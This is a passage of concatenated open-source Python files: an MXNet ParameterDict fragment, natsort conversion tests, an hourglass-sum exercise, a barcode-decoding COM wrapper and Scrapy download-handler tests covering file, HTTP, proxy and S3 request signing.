        found, :py:func:`get` will create a new :py:class:`Parameter` with key-word arguments and
        insert it to self.
        Parameters
        ----------
        name : str
            Name of the desired Parameter. It will be prepended with this dictionary's
            prefix.
        **kwargs : dict
            The rest of key-word arguments for the created :py:class:`Parameter`.
        Returns
        -------
        Parameter
            The created or retrieved :py:class:`Parameter`.
        """
        name = self.prefix + name
        param = self._get_impl(name)
        if param is None:  # pylint: disable=too-many-nested-blocks
            param = Parameter(name, **kwargs)
            self._params[name] = param
        else:
            for k, v in kwargs.items():
                if hasattr(param, k) and getattr(param, k) is not None:
                    existing = getattr(param, k)
                    # Shapes are merged dimension-wise: 0 means "unknown"
                    # and is filled from the other side; any concrete
                    # mismatch (both non-zero and different) is an error.
                    if k == 'shape' and len(v) == len(existing):
                        inferred_shape = []
                        matched = True
                        for dim1, dim2 in zip(v, existing):
                            if dim1 != dim2 and dim1 * dim2 != 0:
                                matched = False
                                break
                            elif dim1 == dim2:
                                inferred_shape.append(dim1)
                            elif dim1 == 0:
                                inferred_shape.append(dim2)
                            else:
                                inferred_shape.append(dim1)
                        if matched:
                            param._shape = tuple(inferred_shape)
                            continue
                    assert v is None or v == existing, \
                        "Cannot retrieve Parameter '%s' because desired attribute " \
                        "does not match with stored for attribute '%s': " \
                        "desired '%s' vs stored '%s'."%(
                            name, k, str(v), str(getattr(param, k)))
                else:
                    setattr(param, k, v)
        return param
    def get_constant(self, name, value=None):
        """Retrieves a :py:class:`Constant` with name ``self.prefix+name``. If not found,
        :py:func:`get` will first try to retrieve it from "shared" dict. If still not
        found, :py:func:`get` will create a new :py:class:`Constant` with key-word
        arguments and insert it to self.
        Parameters
        ----------
        name : str
            Name of the desired Constant. It will be prepended with this dictionary's
            prefix.
        value : array-like
            Initial value of constant.
        Returns
        -------
        Constant
            The created or retrieved :py:class:`Constant`.
        """
        name = self.prefix + name
        param = self._get_impl(name)
        if param is None:
            if value is None:
                raise KeyError("No constant named '{}'. Please specify value " \
                               "if you want to create a new constant.".format(
                                   name))
            param = Constant(name, value)
            self._params[name] = param
        elif value is not None:
            # A value was supplied for an existing entry: it must be a
            # Constant and match the stored value exactly.
            assert isinstance(param, Constant), \
                "Parameter '{}' already exists but it is not a constant.".format(
                    name)
            if isinstance(value, ndarray.NDArray):
                value = value.asnumpy()
            assert param.shape == value.shape and \
                (param.value.asnumpy() == value).all(), \
                "Constant '{}' already exists but it's value doesn't match new " \
                "value".format(name)
        return param
    def update(self, other):
        """Copies all Parameters in ``other`` to self."""
        # Validate all keys before mutating, so a failure leaves self intact.
        for k, v in other.items():
            if k in self._params:
                assert self._params[k] is v, \
                    "Cannot update self with other because they have different " \
                    "Parameters with the same name '%s'"%k
        for k, v in other.items():
            self._params[k] = v
    def initialize(self, init=initializer.Uniform(), ctx=None, verbose=False,
                   force_reinit=False):
        """Initializes all Parameters managed by this dictionary to be used for :py:class:`NDArray`
        API. It has no effect when using :py:class:`Symbol` API.
        Parameters
        ----------
        init : Initializer
            Global default Initializer to be used when :py:meth:`Parameter.init` is ``None``.
            Otherwise, :py:meth:`Parameter.init` takes precedence.
        ctx : Context or list of Context
            Keeps a copy of Parameters on one or many context(s).
        verbose : bool, default False
            Whether to verbosely print out details on initialization.
        force_reinit : bool, default False
            Whether to force re-initialization if parameter is already initialized.
        """
        if verbose:
            init.set_verbosity(verbose=verbose)
        for _, v in self.items():
            v.initialize(None, ctx, init, force_reinit=force_reinit)
    def zero_grad(self):
        """Sets all Parameters' gradient buffer to 0."""
        for i in self.values():
            i.zero_grad()
    def reset_ctx(self, ctx):
        """Re-assign all Parameters to other contexts.
        ctx : Context or list of Context, default :py:meth:`context.current_context()`.
            Assign Parameter to given context. If ctx is a list of Context, a
            copy will be made for each context.
        """
        for i in self.values():
            i.reset_ctx(ctx)
    def setattr(self, name, value):
        """Set an attribute to a new value for all Parameters.
        For example, set grad_req to null if you don't need gradient w.r.t a
        model's Parameters::
            model.collect_params().setattr('grad_req', 'null')
        or change the learning rate multiplier::
            model.collect_params().setattr('lr_mult', 0.5)
        Parameters
        ----------
        name : str
            Name of the attribute.
        value : valid type for attribute name
            The new value for the attribute.
        """
        for i in self.values():
            setattr(i, name, value)
    def save(self, filename, strip_prefix=''):
        """Save parameters to file.
        filename : str
            Path to parameter file.
        strip_prefix : str, default ''
            Strip prefix from parameter names before saving.
        """
        arg_dict = {}
        for param in self.values():
            # _reduce averages copies across contexts onto CPU.
            weight = param._reduce()
            if not param.name.startswith(strip_prefix):
                raise ValueError(
                    "Prefix '%s' is to be striped before saving, but Parameter's "
                    "name '%s' does not start with '%s'. "
                    "this may be due to your Block shares parameters from other "
                    "Blocks or you forgot to use 'with name_scope()' when creating "
                    "child blocks. For more info on naming, please see "
                    "http://mxnet.incubator.apache.org/tutorials/basic/naming.html"%(
                        strip_prefix, param.name, strip_prefix))
            arg_dict[param.name[len(strip_prefix):]] = weight
        ndarray.save(filename, arg_dict)
    def load(self, filename, ctx=None, allow_missing=False,
             ignore_extra=False, restore_prefix=''):
        """Load parameters from file.
        filename : str
            Path to parameter file.
        ctx : Context or list of Context
            Context(s) initialize loaded parameters on.
        allow_missing : bool, default False
            Whether to silently skip loading parameters not represents in the file.
        ignore_extra : bool, default False
            Whether to silently ignore parameters from the file that are not
            present in this ParameterDict.
        restore_prefix : str, default ''
            prepend prefix to names of stored parameters before loading.
        """
        if restore_prefix:
            for name in self.keys():
                assert name.startswith(restore_prefix), \
                    "restore_prefix is '%s' but Parameters name '%s' does not start " \
                    "with '%s'"%(restore_prefix, name, restore_prefix)
        lprefix = len(restore_prefix)
        # Strip legacy 'arg:'/'aux:' prefixes written by the Module API.
        loaded = [(k[4:] if k.startswith('arg:') or k.startswith('aux:') else k, v) \
                  for k, v in ndarray.load(filename).items()]
        arg_dict = {restore_prefix+k: v for k, v in loaded}
        if not allow_missing:
            for name in self.keys():
                assert name in arg_dict, \
                    "Parameter '%s' is missing in file '%s', which contains parameters: %s. " \
                    "Please make sure source and target networks have the same prefix."%(
                        name[lprefix:], filename, _brief_print_list(arg_dict.keys()))
        for name in arg_dict:
            if name not in self._params:
                assert ignore_extra, \
                    "Parameter '%s' loaded from file '%s' is not present in ParameterDict, " \
                    "choices are: %s. Set ignore_extra to True to ignore. " \
                    "Please make sure source and target networks have the same prefix."%(
                        name[lprefix:], filename, _brief_print_list(self._params.keys()))
                continue
            self[name]._load_init(arg_dict[name], ctx)
| fullfanta/mxnet | python/mxnet/gluon/parameter.py | Python | apache-2.0 | 31,399 |
# -*- coding: utf-8 -*-
"""\
Test the fake fastnumbers module.
"""
import unicodedata
from math import isnan
from typing import Union, cast
from hypothesis import given
from hypothesis.strategies import floats, integers, text
from natsort.compat.fake_fastnumbers import fast_float, fast_int
def is_float(x: str) -> bool:
    """Return True if *x* parses as a float, either via ``float()`` or as a
    single unicode numeral character (e.g. a vulgar fraction)."""
    try:
        float(x)
        return True
    except ValueError:
        pass
    try:
        unicodedata.numeric(x)
        return True
    except (ValueError, TypeError):
        return False
def not_a_float(x: str) -> bool:
    # Complement of is_float; used as a hypothesis strategy filter below.
    return not is_float(x)
def is_int(x: Union[str, float]) -> bool:
    """Return True if *x* is a float with an integral value, or a string
    holding an ASCII integer or a single unicode digit character."""
    if hasattr(x, "is_integer"):
        return cast(float, x).is_integer()
    try:
        int(x)
        return True
    except ValueError:
        pass
    try:
        unicodedata.digit(cast(str, x))
        return True
    except (ValueError, TypeError):
        return False
def not_an_int(x: Union[str, float]) -> bool:
    # Complement of is_int; used as a hypothesis strategy filter below.
    return not is_int(x)
# Each test has an "example" version for demonstrative purposes,
# and a test that uses the hypothesis module.
def test_fast_float_returns_nan_alternate_if_nan_option_is_given() -> None:
    # The ``nan`` keyword substitutes a replacement value for NaN results.
    assert fast_float("nan", nan=7) == 7
def test_fast_float_converts_float_string_to_float_example() -> None:
    # Signs, exponents, NaN spellings, and unicode (Persian) digits all parse.
    assert fast_float("45.8") == 45.8
    assert fast_float("-45") == -45.0
    assert fast_float("45.8e-2", key=len) == 45.8e-2
    assert isnan(cast(float, fast_float("nan")))
    assert isnan(cast(float, fast_float("+nan")))
    assert isnan(cast(float, fast_float("-NaN")))
    assert fast_float("۱۲.۱۲") == 12.12
    assert fast_float("-۱۲.۱۲") == -12.12
# Property-based check: repr of any finite float round-trips through fast_float.
@given(floats(allow_nan=False))
def test_fast_float_converts_float_string_to_float(x: float) -> None:
    assert fast_float(repr(x)) == x
def test_fast_float_leaves_string_as_is_example() -> None:
    # Non-numeric strings are returned unchanged rather than raising.
    assert fast_float("invalid") == "invalid"
# Property-based version: any non-empty, non-float string passes through.
@given(text().filter(not_a_float).filter(bool))
def test_fast_float_leaves_string_as_is(x: str) -> None:
    assert fast_float(x) == x
def test_fast_float_with_key_applies_to_string_example() -> None:
    # ``key`` is applied only when the input cannot be converted.
    assert fast_float("invalid", key=len) == len("invalid")
# Property-based version of the ``key`` behaviour above.
@given(text().filter(not_a_float).filter(bool))
def test_fast_float_with_key_applies_to_string(x: str) -> None:
    assert fast_float(x, key=len) == len(x)
def test_fast_int_leaves_float_string_as_is_example() -> None:
    # fast_int converts only integral strings; float-ish ones pass through.
    assert fast_int("45.8") == "45.8"
    assert fast_int("nan") == "nan"
    assert fast_int("inf") == "inf"
# Property-based version: the repr of any non-integral float passes through.
@given(floats().filter(not_an_int))
def test_fast_int_leaves_float_string_as_is(x: float) -> None:
    assert fast_int(repr(x)) == repr(x)
def test_fast_int_converts_int_string_to_int_example() -> None:
    # Signed ASCII and unicode (Persian) digit strings all convert.
    assert fast_int("-45") == -45
    assert fast_int("+45") == 45
    assert fast_int("۱۲") == 12
    assert fast_int("-۱۲") == -12
# Property-based check: repr of any int round-trips through fast_int.
@given(integers())
def test_fast_int_converts_int_string_to_int(x: int) -> None:
    assert fast_int(repr(x)) == x
def test_fast_int_leaves_string_as_is_example() -> None:
    # Non-integer strings are returned unchanged rather than raising.
    assert fast_int("invalid") == "invalid"
# Property-based version: any non-empty, non-int string passes through.
@given(text().filter(not_an_int).filter(bool))
def test_fast_int_leaves_string_as_is(x: str) -> None:
    assert fast_int(x) == x
def test_fast_int_with_key_applies_to_string_example() -> None:
    # ``key`` is applied only when the input cannot be converted.
    assert fast_int("invalid", key=len) == len("invalid")
# Property-based version of the ``key`` behaviour above.
@given(text().filter(not_an_int).filter(bool))
def test_fast_int_with_key_applies_to_string(x: str) -> None:
    assert fast_int(x, key=len) == len(x)
| SethMMorton/natsort | tests/test_fake_fastnumbers.py | Python | mit | 3,584 |
#!/bin/python3
# Read a 6x6 grid of integers from stdin, one space-separated row per line.
arr = []
for arr_i in range(6):
    arr_t = [int(arr_temp) for arr_temp in input().strip().split(' ')]
    arr.append(arr_t)
def hourglass_sum(i, j, grid=None):
    """Return the sum of the hourglass centred at (i, j).

    An hourglass is the 3x3 neighbourhood of (i, j) minus the middle-left
    and middle-right cells.  ``grid`` defaults to the module-level ``arr``
    for backward compatibility; pass an explicit 6x6 grid to reuse the
    function elsewhere.  Valid centres satisfy 1 <= i, j <= 4.
    """
    if grid is None:
        grid = arr
    top = grid[i - 1][j - 1] + grid[i - 1][j] + grid[i - 1][j + 1]
    middle = grid[i][j]
    bottom = grid[i + 1][j - 1] + grid[i + 1][j] + grid[i + 1][j + 1]
    return top + middle + bottom
# Scan all 16 valid hourglass centres and report the maximum sum.
# (The local accumulator previously shadowed the builtin ``sum``; the manual
# max-tracking loop with its -100 sentinel is replaced by max() over a
# generator — equivalent, since every centre is always evaluated and the
# smallest possible hourglass sum is -63.)
max_sum = max(hourglass_sum(i, j) for i in range(1, 5) for j in range(1, 5))
print(max_sum)
| benosment/daily-exercises | hr-2d.py | Python | gpl-2.0 | 482 |
import os
import tempfile
import cv2
try:
from win32com import client as com
from win32com.client import constants as c
except ImportError:
com = c = None
from gouda.barcode import Barcode
from gouda.gouda_error import GoudaError
from gouda.util import debug_print, is_clsid_registered
class DTKEngine(object):
    """Decode using the DTK Barcode Reader SDK
    DTK can decode many types of barcodes - currently using it just for
    Data Matrix

    NOTE(review): Python 2 code (uses ``xrange``); requires pywin32 and the
    DTK COM component to be registered on a Windows host.
    """
    # ProgID of the DTK COM barcode reader.
    CLSID = "DTKBarReader.BarcodeReader"
    def __init__(self, datamatrix):
        if not self.available():
            raise GoudaError('DTK unavailable')
        else:
            com.pythoncom.CoInitialize()
            # Tip from stackoverflow about how to access COM constants
            # http://stackoverflow.com/a/21534997/1773758
            # EnsureDispatch generates the typelib wrapper, which also makes
            # the c.BT_* enumeration constants importable below.
            self.d = com.gencache.EnsureDispatch(self.CLSID)
            if datamatrix:
                self.d.BarcodeTypes = c.BT_DataMatrix
            else:
                self.d.BarcodeTypes = c.BT_Code128 | c.BT_Code39
            # Map values in EBarcodeType to text
            # This would ideally be a class member but the enumeration
            # is visible only after the call to EnsureDispatch.
            self.types = { c.BT_AustraliaPost : 'Australia Post',
                           c.BT_Codabar : 'Codabar',
                           c.BT_Code11 : 'Code 11',
                           c.BT_Code128 : 'Code 128',
                           c.BT_Code39 : 'Code 39',
                           c.BT_Code39Extended : 'Code 39 Extended',
                           c.BT_Code93 : 'Code 93',
                           c.BT_DataMatrix : 'Data Matrix',
                           c.BT_EAN13 : 'EAN-13',
                           c.BT_EAN8 : 'EAN-8',
                           c.BT_IntelligentMail : 'Intelligent Mail',
                           c.BT_Inter2of5 : 'Interleaved 2 of 5',
                           c.BT_MicroQRCode : 'Micro QR Code',
                           c.BT_PatchCode : 'Patch code',
                           c.BT_PDF417 : 'PDF 417',
                           c.BT_PharmaCode : 'Pharma Code',
                           c.BT_Planet : 'Planet',
                           c.BT_Plus2 : 'Plus 2',
                           c.BT_Plus5 : 'Plus 5',
                           c.BT_Postnet : 'Postnet',
                           c.BT_QRCode : 'QR Code',
                           c.BT_RM4SCC : 'RM 4 SCC',
                           c.BT_RSS14 : 'RSS 14',
                           c.BT_RSSExpanded : 'RSS Expanded',
                           c.BT_RSSLimited : 'RSS Limited',
                           c.BT_UCC128 : 'UCC 128',
                           c.BT_Unknown : 'Unknown',
                           c.BT_UPCA : 'UPCA',
                           c.BT_UPCE : 'UPCE',
                         }
    @classmethod
    def available(cls):
        # Usable only when pywin32 imported successfully and the COM class
        # is registered on this machine.
        return com is not None and is_clsid_registered(cls.CLSID)
    def decode_file(self, path):
        """Decode barcodes from the image file at ``path``; returns a list
        of Barcode(type_name, value)."""
        self.d.ReadFromFile(str(path))
        barcodes = [None] * self.d.Barcodes.Count
        for i in xrange(0, self.d.Barcodes.Count):
            b = self.d.Barcodes.Item(i)
            barcodes[i] = Barcode(self.types.get(b.Type, 'Unknown'),
                                  b.BarcodeString)
        return barcodes
    def __call__(self, img):
        """Decode barcodes from an in-memory OpenCV image by round-tripping
        it through a temporary PNG (DTK reads only from files)."""
        # Temporary files on Windows are pain
        # delete=False because the file must be re-openable by DTK while we
        # still hold the handle; cleaned up manually in the finally block.
        img_temp = tempfile.NamedTemporaryFile(suffix='.png', delete=False)
        try:
            debug_print('Writing temp file [{0}] for DTK'.format(img_temp.name))
            cv2.imwrite(img_temp.name, img)
            return self.decode_file(img_temp.name)
        finally:
            # TODO LH Logic here?
            img_temp.close()
            os.unlink(img_temp.name)
| koceg/gouda | gouda/engines/dtk.py | Python | gpl-2.0 | 3,651 |
import os
import twisted
from twisted.trial import unittest
from twisted.protocols.policies import WrappingFactory
from twisted.python.filepath import FilePath
from twisted.internet import reactor, defer, error
from twisted.web import server, static, util, resource
from twisted.web.test.test_webclient import ForeverTakingResource, \
NoLengthResource, HostHeaderResource, \
PayloadResource, BrokenDownloadResource
from twisted.protocols.ftp import FTPRealm, FTPFactory
from twisted.cred import portal, checkers, credentials
from twisted.protocols.ftp import FTPClient, ConnectionLost
from w3lib.url import path_to_file_uri
from scrapy import twisted_version
from scrapy.core.downloader.handlers import DownloadHandlers
from scrapy.core.downloader.handlers.file import FileDownloadHandler
from scrapy.core.downloader.handlers.http import HTTPDownloadHandler, HttpDownloadHandler
from scrapy.core.downloader.handlers.http10 import HTTP10DownloadHandler
from scrapy.core.downloader.handlers.http11 import HTTP11DownloadHandler
from scrapy.core.downloader.handlers.s3 import S3DownloadHandler
from scrapy.core.downloader.handlers.ftp import FTPDownloadHandler
from scrapy.spider import Spider
from scrapy.http import Request
from scrapy.settings import Settings
from scrapy import optional_features
from scrapy.utils.test import get_crawler
from scrapy.exceptions import NotConfigured
class DummyDH(object):
    """Stub download handler used by LoadTestCase: accepting the crawler
    without error marks its scheme as successfully configured."""
    def __init__(self, crawler):
        # Intentionally ignores the crawler; construction alone suffices.
        pass
class OffDH(object):
    """Stub download handler whose constructor raises NotConfigured,
    marking its scheme as deliberately unavailable."""
    def __init__(self, crawler):
        raise NotConfigured
class LoadTestCase(unittest.TestCase):
    """Tests for DownloadHandlers scheme registration: a handler ends up in
    exactly one of _handlers (usable), _notconfigured (declined), or
    neither (explicitly disabled with None)."""
    def test_enabled_handler(self):
        # A handler that constructs cleanly is registered as usable.
        handlers = {'scheme': 'tests.test_downloader_handlers.DummyDH'}
        crawler = get_crawler(settings_dict={'DOWNLOAD_HANDLERS': handlers})
        dh = DownloadHandlers(crawler)
        self.assertIn('scheme', dh._handlers)
        self.assertNotIn('scheme', dh._notconfigured)
    def test_not_configured_handler(self):
        # A handler raising NotConfigured is tracked but not usable.
        handlers = {'scheme': 'tests.test_downloader_handlers.OffDH'}
        crawler = get_crawler(settings_dict={'DOWNLOAD_HANDLERS': handlers})
        dh = DownloadHandlers(crawler)
        self.assertNotIn('scheme', dh._handlers)
        self.assertIn('scheme', dh._notconfigured)
    def test_disabled_handler(self):
        # Setting a scheme to None disables it entirely: absent from both.
        handlers = {'scheme': None}
        crawler = get_crawler(settings_dict={'DOWNLOAD_HANDLERS': handlers})
        dh = DownloadHandlers(crawler)
        self.assertNotIn('scheme', dh._handlers)
        self.assertNotIn('scheme', dh._notconfigured)
class FileTestCase(unittest.TestCase):
    """Tests for the file:// download handler."""
    def setUp(self):
        # the '^' suffix in the filename exercises URI percent-encoding below
        self.tmpname = self.mktemp()
        fd = open(self.tmpname + '^', 'w')
        fd.write('0123456789')
        fd.close()
        self.download_request = FileDownloadHandler(Settings()).download_request
    def test_download(self):
        def _test(response):
            self.assertEquals(response.url, request.url)
            self.assertEquals(response.status, 200)
            self.assertEquals(response.body, '0123456789')
        request = Request(path_to_file_uri(self.tmpname + '^'))
        # path_to_file_uri must have escaped the '^' as %5E
        assert request.url.upper().endswith('%5E')
        return self.download_request(request, Spider('foo')).addCallback(_test)
    def test_non_existent(self):
        # a missing file fails the returned deferred with IOError
        request = Request('file://%s' % self.mktemp())
        d = self.download_request(request, Spider('foo'))
        return self.assertFailure(d, IOError)
class HttpTestCase(unittest.TestCase):
    """Runs a download handler against a local twisted web site.

    Subclasses override ``download_handler_cls`` so the same suite
    exercises the HTTP 1.0 and HTTP 1.1 handler implementations.
    """
    download_handler_cls = HTTPDownloadHandler

    def setUp(self):
        # serve a small static tree plus special-purpose test resources
        name = self.mktemp()
        os.mkdir(name)
        FilePath(name).child("file").setContent("0123456789")
        r = static.File(name)
        r.putChild("redirect", util.Redirect("/file"))
        r.putChild("wait", ForeverTakingResource())
        r.putChild("hang-after-headers", ForeverTakingResource(write=True))
        r.putChild("nolength", NoLengthResource())
        r.putChild("host", HostHeaderResource())
        r.putChild("payload", PayloadResource())
        r.putChild("broken", BrokenDownloadResource())
        self.site = server.Site(r, timeout=None)
        self.wrapper = WrappingFactory(self.site)
        self.port = reactor.listenTCP(0, self.wrapper, interface='127.0.0.1')
        self.portno = self.port.getHost().port
        self.download_handler = self.download_handler_cls(Settings())
        self.download_request = self.download_handler.download_request

    @defer.inlineCallbacks
    def tearDown(self):
        yield self.port.stopListening()
        if hasattr(self.download_handler, 'close'):
            yield self.download_handler.close()

    def getURL(self, path):
        return "http://127.0.0.1:%d/%s" % (self.portno, path)

    def test_download(self):
        request = Request(self.getURL('file'))
        d = self.download_request(request, Spider('foo'))
        d.addCallback(lambda r: r.body)
        d.addCallback(self.assertEquals, "0123456789")
        return d

    def test_download_head(self):
        # HEAD responses must carry an empty body
        request = Request(self.getURL('file'), method='HEAD')
        d = self.download_request(request, Spider('foo'))
        d.addCallback(lambda r: r.body)
        d.addCallback(self.assertEquals, '')
        return d

    def test_redirect_status(self):
        # the handler itself does not follow redirects; 302 is returned
        request = Request(self.getURL('redirect'))
        d = self.download_request(request, Spider('foo'))
        d.addCallback(lambda r: r.status)
        d.addCallback(self.assertEquals, 302)
        return d

    def test_redirect_status_head(self):
        request = Request(self.getURL('redirect'), method='HEAD')
        d = self.download_request(request, Spider('foo'))
        d.addCallback(lambda r: r.status)
        d.addCallback(self.assertEquals, 302)
        return d

    @defer.inlineCallbacks
    def test_timeout_download_from_spider(self):
        spider = Spider('foo')
        meta = {'download_timeout': 0.2}
        # client connects but no data is received
        request = Request(self.getURL('wait'), meta=meta)
        d = self.download_request(request, spider)
        yield self.assertFailure(d, defer.TimeoutError, error.TimeoutError)
        # client connects, server send headers and some body bytes but hangs
        request = Request(self.getURL('hang-after-headers'), meta=meta)
        d = self.download_request(request, spider)
        yield self.assertFailure(d, defer.TimeoutError, error.TimeoutError)

    def test_host_header_not_in_request_headers(self):
        def _test(response):
            self.assertEquals(response.body, '127.0.0.1:%d' % self.portno)
            self.assertEquals(request.headers, {})
        request = Request(self.getURL('host'))
        return self.download_request(request, Spider('foo')).addCallback(_test)

    # NOTE: four duplicated lines that previously followed the return below
    # were unreachable dead code and have been removed.
    def test_host_header_seted_in_request_headers(self):
        def _test(response):
            self.assertEquals(response.body, 'example.com')
            self.assertEquals(request.headers.get('Host'), 'example.com')
        request = Request(self.getURL('host'), headers={'Host': 'example.com'})
        return self.download_request(request, Spider('foo')).addCallback(_test)

    def test_payload(self):
        body = '1'*100 # PayloadResource requires body length to be 100
        request = Request(self.getURL('payload'), method='POST', body=body)
        d = self.download_request(request, Spider('foo'))
        d.addCallback(lambda r: r.body)
        d.addCallback(self.assertEquals, body)
        return d
class DeprecatedHttpTestCase(HttpTestCase):
    """Runs the HTTP suite against the deprecated ``HttpDownloadHandler``."""
    download_handler_cls = HttpDownloadHandler
class Http10TestCase(HttpTestCase):
    """HTTP 1.0 test case: runs the suite against HTTP10DownloadHandler."""
    download_handler_cls = HTTP10DownloadHandler
class Http11TestCase(HttpTestCase):
    """HTTP 1.1 test case: runs the suite against HTTP11DownloadHandler."""
    download_handler_cls = HTTP11DownloadHandler
    if 'http11' not in optional_features:
        # skip whole case on twisted versions without the 'http11' feature
        skip = 'HTTP1.1 not supported in twisted < 11.1.0'
class UriResource(resource.Resource):
    """Return the full uri that was requested."""

    def getChild(self, path, request):
        # this resource handles every path itself, at any depth
        return self

    def render(self, request):
        # echo the raw request URI back as the response body
        return request.uri
class HttpProxyTestCase(unittest.TestCase):
    """Tests proxy support of the HTTP handlers, using a local server that
    echoes back the URI it receives (UriResource)."""
    download_handler_cls = HTTPDownloadHandler
    def setUp(self):
        site = server.Site(UriResource(), timeout=None)
        wrapper = WrappingFactory(site)
        self.port = reactor.listenTCP(0, wrapper, interface='127.0.0.1')
        self.portno = self.port.getHost().port
        self.download_handler = self.download_handler_cls(Settings())
        self.download_request = self.download_handler.download_request
    @defer.inlineCallbacks
    def tearDown(self):
        yield self.port.stopListening()
        if hasattr(self.download_handler, 'close'):
            yield self.download_handler.close()
    def getURL(self, path):
        return "http://127.0.0.1:%d/%s" % (self.portno, path)
    def test_download_with_proxy(self):
        # with meta['proxy'] set, the absolute URL reaches the proxy server
        def _test(response):
            self.assertEquals(response.status, 200)
            self.assertEquals(response.url, request.url)
            self.assertEquals(response.body, 'http://example.com')
        http_proxy = self.getURL('')
        request = Request('http://example.com', meta={'proxy': http_proxy})
        return self.download_request(request, Spider('foo')).addCallback(_test)
    def test_download_with_proxy_https_noconnect(self):
        # '?noconnect' on the proxy URL: https request still reaches the
        # proxy as a plain absolute-URI request (presumably bypassing
        # CONNECT tunneling -- confirm against the handler implementation)
        def _test(response):
            self.assertEquals(response.status, 200)
            self.assertEquals(response.url, request.url)
            self.assertEquals(response.body, 'https://example.com')
        http_proxy = '%s?noconnect' % self.getURL('')
        request = Request('https://example.com', meta={'proxy': http_proxy})
        return self.download_request(request, Spider('foo')).addCallback(_test)
    def test_download_without_proxy(self):
        # without a proxy only the path is sent to the server
        def _test(response):
            self.assertEquals(response.status, 200)
            self.assertEquals(response.url, request.url)
            self.assertEquals(response.body, '/path/to/resource')
        request = Request(self.getURL('path/to/resource'))
        return self.download_request(request, Spider('foo')).addCallback(_test)
class DeprecatedHttpProxyTestCase(unittest.TestCase):
    """Old deprecated reference to http10 downloader handler"""
    # NOTE(review): this subclasses unittest.TestCase rather than
    # HttpProxyTestCase, so unlike DeprecatedHttpTestCase it inherits no
    # test methods and effectively runs nothing -- confirm this is intended.
    download_handler_cls = HttpDownloadHandler
class Http10ProxyTestCase(HttpProxyTestCase):
    # proxy test suite against the HTTP 1.0 handler
    download_handler_cls = HTTP10DownloadHandler
class Http11ProxyTestCase(HttpProxyTestCase):
    # proxy test suite against the HTTP 1.1 handler
    download_handler_cls = HTTP11DownloadHandler
    if 'http11' not in optional_features:
        # skip whole case on twisted versions without the 'http11' feature
        skip = 'HTTP1.1 not supported in twisted < 11.1.0'
class HttpDownloadHandlerMock(object):
    """Mock HTTP handler that hands the request straight back.

    S3TestCase injects this so the (signed) request produced by the S3
    handler can be inspected instead of being downloaded.
    """

    def __init__(self, settings):
        # settings are accepted for interface compatibility and ignored
        pass

    def download_request(self, request, spider):
        # echo the request so callers can assert on its headers
        return request
class S3TestCase(unittest.TestCase):
    """Verifies the AWS request signatures produced by S3DownloadHandler."""
    # unittest `skip`: evaluates to the reason string when boto is missing,
    # False otherwise
    skip = 'boto' not in optional_features and 'missing boto library'
    # test use same example keys than amazon developer guide
    # http://s3.amazonaws.com/awsdocs/S3/20060301/s3-dg-20060301.pdf
    # and the tests described here are the examples from that manual
    AWS_ACCESS_KEY_ID = '0PN5J17HBGZHT7JJ3X82'
    AWS_SECRET_ACCESS_KEY = 'uV3F3YluFJax1cknvbcGwgjvx4QpvB+leU8dUj2o'
    def setUp(self):
        # HttpDownloadHandlerMock returns the signed request for inspection
        s3reqh = S3DownloadHandler(Settings(), self.AWS_ACCESS_KEY_ID, \
                self.AWS_SECRET_ACCESS_KEY, \
                httpdownloadhandler=HttpDownloadHandlerMock)
        self.download_request = s3reqh.download_request
        self.spider = Spider('foo')
    def test_request_signing1(self):
        # gets an object from the johnsmith bucket.
        req = Request('s3://johnsmith/photos/puppy.jpg',
                headers={'Date': 'Tue, 27 Mar 2007 19:36:42 +0000'})
        httpreq = self.download_request(req, self.spider)
        self.assertEqual(httpreq.headers['Authorization'], \
                'AWS 0PN5J17HBGZHT7JJ3X82:xXjDGYUmKxnwqr5KXNPGldn5LbA=')
    def test_request_signing2(self):
        # puts an object into the johnsmith bucket.
        req = Request('s3://johnsmith/photos/puppy.jpg', method='PUT', headers={
            'Content-Type': 'image/jpeg',
            'Date': 'Tue, 27 Mar 2007 21:15:45 +0000',
            'Content-Length': '94328',
            })
        httpreq = self.download_request(req, self.spider)
        self.assertEqual(httpreq.headers['Authorization'], \
                'AWS 0PN5J17HBGZHT7JJ3X82:hcicpDDvL9SsO6AkvxqmIWkmOuQ=')
    def test_request_signing3(self):
        # lists the content of the johnsmith bucket.
        req = Request('s3://johnsmith/?prefix=photos&max-keys=50&marker=puppy', \
                method='GET', headers={
                    'User-Agent': 'Mozilla/5.0',
                    'Date': 'Tue, 27 Mar 2007 19:42:41 +0000',
                    })
        httpreq = self.download_request(req, self.spider)
        self.assertEqual(httpreq.headers['Authorization'], \
                'AWS 0PN5J17HBGZHT7JJ3X82:jsRt/rhG+Vtp88HrYL706QhE4w4=')
    def test_request_signing4(self):
        # fetches the access control policy sub-resource for the 'johnsmith' bucket.
        req = Request('s3://johnsmith/?acl', \
                method='GET', headers={'Date': 'Tue, 27 Mar 2007 19:44:46 +0000'})
        httpreq = self.download_request(req, self.spider)
        self.assertEqual(httpreq.headers['Authorization'], \
                'AWS 0PN5J17HBGZHT7JJ3X82:thdUi9VAkzhkniLj96JIrOPGi0g=')
    def test_request_signing5(self):
        # deletes an object from the 'johnsmith' bucket using the
        # path-style and Date alternative.
        req = Request('s3://johnsmith/photos/puppy.jpg', \
                method='DELETE', headers={
                    'Date': 'Tue, 27 Mar 2007 21:20:27 +0000',
                    'x-amz-date': 'Tue, 27 Mar 2007 21:20:26 +0000',
                    })
        httpreq = self.download_request(req, self.spider)
        self.assertEqual(httpreq.headers['Authorization'], \
                'AWS 0PN5J17HBGZHT7JJ3X82:k3nL7gH3+PadhTEVn5Ip83xlYzk=')
    def test_request_signing6(self):
        # uploads an object to a CNAME style virtual hosted bucket with metadata.
        req = Request('s3://static.johnsmith.net:8080/db-backup.dat.gz', \
                method='PUT', headers={
                    'User-Agent': 'curl/7.15.5',
                    'Host': 'static.johnsmith.net:8080',
                    'Date': 'Tue, 27 Mar 2007 21:06:08 +0000',
                    'x-amz-acl': 'public-read',
                    'content-type': 'application/x-download',
                    'Content-MD5': '4gJE4saaMU4BqNR0kLY+lw==',
                    'X-Amz-Meta-ReviewedBy': 'joe@johnsmith.net,jane@johnsmith.net',
                    'X-Amz-Meta-FileChecksum': '0x02661779',
                    'X-Amz-Meta-ChecksumAlgorithm': 'crc32',
                    'Content-Disposition': 'attachment; filename=database.dat',
                    'Content-Encoding': 'gzip',
                    'Content-Length': '5913339',
                    })
        httpreq = self.download_request(req, self.spider)
        self.assertEqual(httpreq.headers['Authorization'], \
                'AWS 0PN5J17HBGZHT7JJ3X82:C0FlOtU8Ylb9KDTpZqYkZPX91iI=')
